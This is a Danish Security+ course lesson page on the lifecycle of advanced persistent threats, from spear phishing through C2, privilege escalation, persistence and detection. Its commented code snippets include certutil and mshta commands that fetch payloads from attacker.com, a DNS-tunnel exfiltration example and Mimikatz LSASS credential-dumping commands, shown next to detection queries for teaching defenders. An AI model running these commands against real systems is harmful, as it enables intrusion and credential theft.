Security+ Academy · Lektion

APT-livscyklus: fra første adgang til persistence

Følg en APT fra første adgang via spear phishing gennem etablering af C2, rettighedseskalering og persistence-mekanismer, der overlever genstarter og ny afbildning af systemet.

Lektion 1 af 413 trin

APT-livscyklus: fra første adgang til persistence er en gratis Security+ Academy-lektion på CoddyKit. Dette er lektion 1 af 4. Du kan læse alle 3 lektioner i dette læringsspor gratis i deres fulde længde — derefter låser CoddyKit PRO alle lektioner op samt praktiske øvelser med en indbygget kodeeditor og en AI-underviser døgnet rundt. Den er en del af læringsforløbet i Security+ Academy, og dine fremskridt synkroniseres på tværs af nettet og CoddyKit-appen. Security+ Academy-kurset indeholder 4 lektioner i alt.

Hvad er en avanceret vedvarende trussel?

En Advanced Persistent Threat (APT) er en sofistikeret, langsigtet cyberangrebskampagne, der typisk udføres af statsstøttede aktører eller vel?finansierede kriminelle grupper med specifikke strategiske mål. De tre kendetegn er: Advanced – bruger specialtilpasset malware, zero-day-sårbarheder og nye teknikker; Persistent – opretholder en skjult tilstedeværelse i måneder eller år og er ikke et hurtigt ind-og-ud-angreb; Threat – et koordineret, målrettet angreb mod en bestemt organisation. Kendte APT-grupper omfatter APT28 (Fancy Bear), der forbindes med Ruslands GRU, APT41, der forbindes med Kina, og Lazarus Group, der forbindes med Nordkorea.

Indledende adgang: Sådan kommer APT'er ind

APT-kampagner begynder typisk med en af et lille antal gennemprøvede teknikker til indledende adgang. Målrettet phishing med skadelige vedhæftede filer eller links, der stjæler legitimationsoplysninger, er den mest almindelige metode – e-mailen ser ud til at komme fra en betroet kollega eller partner. Kompromittering af forsyningskæden (som i SolarWinds/SUNBURST) indsætter skadelig kode i betroede softwareopdateringer. Udnyttelse af internetvendte tjenester (VPN-apparater, Exchange-servere og webapplikationer) ved hjælp af ikke-opdaterede CVE'er. Ved vandhulangreb kompromitteres websteder, som målorganisationens medarbejdere ofte besøger, hvorefter besøgende udsættes for drive-by-udnyttelse.

Kørsel: Den første nyttelast køres

Efter at have opnået indledende adgang skal angriberen køre sin første nyttelast på målsystemet. APT'er foretrækker teknikker, der ligner normal systemaktivitet: skadelige makroer i Office-dokumenter, som køres, når offeret aktiverer indhold; HTML Application-filer (HTA-filer), som kører scripts, når de åbnes; Living-off-the-Land-binærfiler (LOLBins) – brug af legitime Windows-værktøjer som mshta.exe, certutil.exe, regsvr32.exe eller wscript.exe til at køre angriberkode og omgå lister over tilladte applikationer. Disse teknikker gør det vanskeligt at skelne de første nyttelaster fra legitim systemaktivitet.

# Example LOLBin abuse: certutil used to download payload
# certutil.exe -urlcache -split -f http://attacker.com/payload.exe payload.exe

# Example: mshta executing remote HTA
# mshta.exe http://attacker.com/malicious.hta

# Detection: alert on certutil/mshta with network connections

Etablering af C2: At ringe hjem

Når den første nyttelast kører, opretter den en Command and Control (C2)-kanal tilbage til angriberens infrastruktur. Moderne APT-C2 anvender teknikker, der er udviklet til at undgå registrering: HTTPS til domæner, der ligner kendte domæner, og som efterligner legitime cloud-tjenester (Teams, OneDrive, GitHub); DNS-tunneling – kommandoer kodes i forespørgsler efter DNS TXT-poster, der ligner normal DNS-trafik; domænegenereringsalgoritmer (DGA'er), der hver dag genererer et nyt C2-domæne ud fra et starttal, så blokering af domæner bliver ineffektiv; og C2 efter princippet living-off-the-land, hvor legitime cloud-platforme (Slack API, Google Sheets, Twitter) bruges som kommunikationskanal.

# DNS tunneling detection: look for unusually long DNS queries
# Normal DNS query: www.google.com (13 chars)
# DNS tunnel query: 4f72d3a1b9c2e5f8.exfil.attacker.com (38 chars of encoded data)

# Zeek/Bro detection rule concept:
# alert dns (dns.qname length > 50)

Kortlægning: Kortlægning af miljøet

Efter at have etableret C2 udfører APT-aktører intern rekognoscering for at forstå miljøet, før de går videre. Det omfatter: optælling af Active Directory med værktøjer som BloodHound for at kortlægge tillidsrelationer og identificere værdifulde mål; netværksscanning for at identificere aktive værter, tjenester og åbne porte; opdagelse af legitimationsoplysninger ved at søge i filsystemer efter konfigurationsfiler, adgangskodedatabaser eller legitimationsoplysninger, der er gemt i browsere; og identitetsoptælling for at identificere privilegerede konti, tjenestekonti og administratorarbejdsstationer. Det meste af opdagelsesaktiviteten bruger oprindelige Windows-værktøjer (net user /domain, ipconfig, nltest) for at undgå registrering.

# Native Windows commands used by APTs for discovery
# net user /domain                    # list domain users
# net group 'Domain Admins' /domain   # list domain admins
# ipconfig /all                       # network configuration
# netstat -ano                        # active network connections
# tasklist /v                         # running processes

Rettighedsforøgelse: Sådan opnås administratoradgang

APT'er opnår typisk indledende adgang med begrænsede brugerlegitimationsoplysninger og skal forøge deres rettigheder for at nå deres mål. Almindelige veje til rettighedsforøgelse omfatter: tyveri af legitimationsoplysninger fra hukommelsen med Mimikatz (udtrækning af NTLM-hashes fra LSASS-processens hukommelse); Kerberoasting (anmodning om tjenestebilletter til tjenestekonti og knækning af dem offline); udnyttelse af fejlkonfigurerede tjenester med svage tilladelser (usikre stier til tjenestebinærfiler og DLL-kapring); og personificering af tokens for at stjæle godkendelsestokenet fra en privilegeret proces. Teknikker til omgåelse af User Account Control (UAC) gør det muligt at gå fra almindelig administrator til SYSTEM uden at udløse en UAC-prompt.

# Mimikatz: dump credentials from LSASS memory
# (defender perspective - what attackers run)
# privilege::debug
# sekurlsa::logonpasswords

# Detection: alert on LSASS memory reads by non-system processes
# Windows Event ID 4656/4663: access to LSASS process

Mekanismer til vedvarende adgang: Overlevelse efter genstart

APT'er investerer massivt i mekanismer til vedvarende adgang, der overlever genstarter og genafbildning, fordi den indledende adgang kan have været vanskelig og dyr at opnå. Almindelige Windows-teknikker til vedvarende adgang er: Registry Run Keys (HKLM\Software\Microsoft\Windows\CurrentVersion\Run); Scheduled Tasks, der kører malware efter en fast plan; Windows Services, der starter automatisk; WMI Event Subscriptions (svære at opdage og overlever de fleste oprydningsforsøg); DLL Search Order Hijacking; og Boot/Pre-OS-implantater (UEFI-firmwareimplantater, der overlever geninstallation af operativsystemet, og som bruges af aktører fra Equation Group/NSA).

# Common persistence locations to monitor
# Registry:
# HKLM\Software\Microsoft\Windows\CurrentVersion\Run
# HKCU\Software\Microsoft\Windows\CurrentVersion\Run
# HKLM\System\CurrentControlSet\Services

# Check scheduled tasks for suspicious entries
# schtasks /query /fo LIST /v | findstr 'Task Name\|Run As User\|Task To Run'

Forsvarsundvigelse: At skjule sig for øjnene af alle

APT'er anvender omfattende forsvarsundvigelse for at undgå at blive opdaget af sikkerhedsværktøjer på slutpunkter og af analytikere. Teknikkerne omfatter: procesinjektion — indsættelse af skadelig kode i legitime processer som explorer.exe eller svchost.exe, så malwaren kører under navnet på en betroet proces; ændring af tidsstempler — ændring af filers tidsstempler, så skadelige filer ser ud til at have eksisteret i årevis; sletning og manipulation af logge — rydning af Windows-hændelseslogge for at fjerne beviser; misbrug af kodesigneringscertifikater — signering af malware med stjålne, legitime certifikater; samt kørsel i hukommelsen (filløs malware), som aldrig skriver til disken, hvor filbaseret antivirus ville kunne opdage den.

Eksfiltration: Skjult datatyveri

APT'er håndterer dataeksfiltration omhyggeligt for at undgå at udløse DLP-kontroller og registrering af unormal båndbredde. Teknikkerne omfatter: klargøring af data — indsamling af målrettede data i et krypteret arkiv, før de eksfiltreres i små dele over flere dage; HTTPS-eksfiltration til cloudlagringstjenester (OneDrive, Dropbox), som er tilladt af virksomhedens firewallregler; steganografi — skjul af data i billedfiler; samt tidsbaseret eksfiltration i arbejdstiden for at ligne legitim trafik. APT'er eksfiltrerer kun det, de har brug for (værdifuld intellektuel ejendom, legitimationsoplysninger og strategiske planer) i stedet for at kopiere alt i store mængder — hvilket minimerer deres spor og sandsynligheden for at blive opdaget.

Registrering af APT-aktivitet: Vigtige indikatorer

Registrering af APT'er kræver, at du ser ud over individuelle alarmer for at identificere mønstre af relateret aktivitet på tværs af hele angrebskæden. Vigtige indikatorer omfatter: usædvanlige relationer mellem overordnede og underordnede processer (f.eks. at Word starter PowerShell); PowerShell-kommandoer med kodning eller downloads fra internettet; planlagte opgaver eller tjenester, der oprettes på usædvanlige tidspunkter; LSASS-adgang til hukommelsen fra processer, der ikke er systemprocesser; lateral bevægelse via SMB eller WMI fra arbejdsstationer; samt usædvanlige udgående DNS-forespørgsler med lange underdomænenavne. MITRE ATT&CK Navigator gør det muligt for forsvarere at knytte registrerede teknikker til ATT&CK-matricen og identificere huller i deres dækningsgrad for registrering.

# Splunk query: detect PowerShell encoded command execution
# index=windows source=WinEventLog:Security EventCode=4688
# | search NewProcessName='*powershell*' CommandLine='*-enc*'
# | table _time, ComputerName, SubjectUserName, CommandLine

APT-håndtering: Inddæmning uden at afsløre sig

Håndtering af en aktiv APT kræver en omhyggelig balance: Inddæm truslen uden at advare angriberen. For tidlig inddæmning (blokering af C2-trafik, deaktivering af konti) kan få APT'en til at aktivere destruktive nyttelaster eller fremskynde eksfiltrationen. Anbefalede fremgangsmåder omfatter: skjult overvågning, mens du indsamler efterretninger; gradvis segmentering af inficerede værter ved hjælp af firewallregler uden at blokere C2; implementering af vildledningsteknologier (honeytokens og kanarikonti) til overvågning af angriberens aktivitet; samt koordinering med politiet før større inddæmningshandlinger. Fuld udbedring kræver, at du identificerer alle mekanismer til vedvarende adgang og kompromitterede konti — ét overset implantat er nok til, at angriberen vender tilbage.

Hurtigt tjek

Test din forståelse af CompTIA Security+ (SY0-701)-begreberne fra denne lektion.

Opsummering af lektionen

I denne lektion har du lært, at APT'er er avancerede, vedvarende og målrettede kampagner, som typisk opererer i månedsvis ved hjælp af spear phishing, angreb på forsyningskæden eller udnyttelse af sårbarheder for at opnå indledende adgang, at APT'er bruger LOLBins og legitime cloudtjenester til C2 for at ligne normal trafik og undgå registrering, samt at mekanismer til vedvarende adgang spænder fra Registry Run Keys til UEFI-firmwareimplantater — hvor WMI-abonnementer er særligt vanskelige at registrere og udbedre. Næste gang gennemgår vi teknikker til lateral bevægelse, herunder Pass-the-Hash og Pass-the-Ticket.

Gratis at komme i gang

Lær Security+ Academy med en AI-underviser — gratis

Skriv og kør rigtig kode i din browser, få øjeblikkelig hjælp fra en AI-underviser døgnet rundt, og fortsæt, hvor du slap, på web eller i appen.

Kurser
30
Lektioner
120

Ofte stillede spørgsmål

Er lektionen “APT-livscyklus: fra første adgang til persistence” gratis?

Ja — alle 3 lektioner i læringssporet Security+ Academy, inklusive “APT-livscyklus: fra første adgang til persistence”, kan læses gratis i deres fulde længde her på webstedet. Derefter låser CoddyKit PRO alle lektioner op samt interaktive øvelser med en indbygget kodeeditor og en AI-underviser døgnet rundt. Security+ Academy-kurset indeholder 4 lektioner i alt.

Hvad lærer jeg i “APT-livscyklus: fra første adgang til persistence”?

Følg en APT fra første adgang via spear phishing gennem etablering af C2, rettighedseskalering og persistence-mekanismer, der overlever genstarter og ny afbildning af systemet. Du øver dig i Security+ Academy med praktisk kode, som du kører direkte i browseren, og en AI-vejleder døgnet rundt besvarer dine spørgsmål, mens du arbejder dig gennem lektionen.

Skal jeg have erfaring for at begynde på Security+ Academy?

Der kræves ingen tidligere erfaring. Security+ Academy på CoddyKit er tilrettelagt for både begyndere og øvede, så du kan starte her eller fra begyndelsen og lære i dit eget tempo. Dette er lektion 1 af 4.

Hvor lang tid tager lektionen “APT-livscyklus: fra første adgang til persistence”?

De fleste CoddyKit-lektioner tager cirka 5–10 minutter. Hver lektion er kort og interaktiv, så du gør løbende fremskridt og kan fortsætte, hvor du slap – på både web og app.

Kan jeg skrive og køre kode i denne Security+ Academy-lektion?

Ja. Alle Security+ Academy-lektioner har en indbygget kodeeditor, så du kan skrive og køre rigtig kode direkte i din browser og få øjeblikkelig feedback fra AI – uden lokal opsætning.

Alle lektioner i dette kursus

  1. APT-livscyklus: fra første adgang til persistence
  2. Lateral bevægelse: Pass-the-Hash og Pass-the-Ticket
  3. Kerberoasting- og Golden Ticket-angreb
  4. MITRE ATT&CK-framework til detektion og respons
← Tilbage til Security+ Academy